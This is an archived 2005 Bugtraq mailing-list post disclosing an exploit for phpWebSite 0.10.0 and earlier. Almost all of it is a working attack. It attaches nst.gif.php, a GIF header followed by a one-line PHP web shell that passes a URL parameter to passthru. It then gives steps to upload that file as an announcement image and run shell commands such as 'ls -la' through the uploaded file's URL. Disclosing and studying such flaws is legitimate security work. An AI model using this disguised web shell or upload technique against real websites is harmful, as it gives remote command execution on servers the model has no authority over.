[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    phpWebSite-0.10.0_exploit
From:       tjomka <tjomka () navigator ! lv>
Date:       2005-02-24 22:16:21
Message-ID: 1338942961.20050225001621 () navigator ! lv
[Download RAW message or body]

phpWebSite-0.10.0_exploit
["nst.gif.php" (application/octet-stream)]

GIF89a22MMMQQQ2[[[



	|̈́UUU<pre> O

<?passthru($_GET[nst]);?>WV(QɐY_&D=S
f9[[X;
["phpWebSite-0.10.0.EN.txt" (text/plain)]

oooo...oooo.oooooooo8.ooooooooooo 
.8888o..88.888........88..888..88 
.88.888o88..888oooooo.....888     
.88...8888.........888....888     
o88o....88.o88oooo888....o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: phpWebSite <= v0.10.0
* Bug found by: nst
* Date: 24.02.2005
********************************

Web: phpwebsite.appstate.edu

http://target/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://target/images/announce/nst.gif.php?nst=ls -la

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic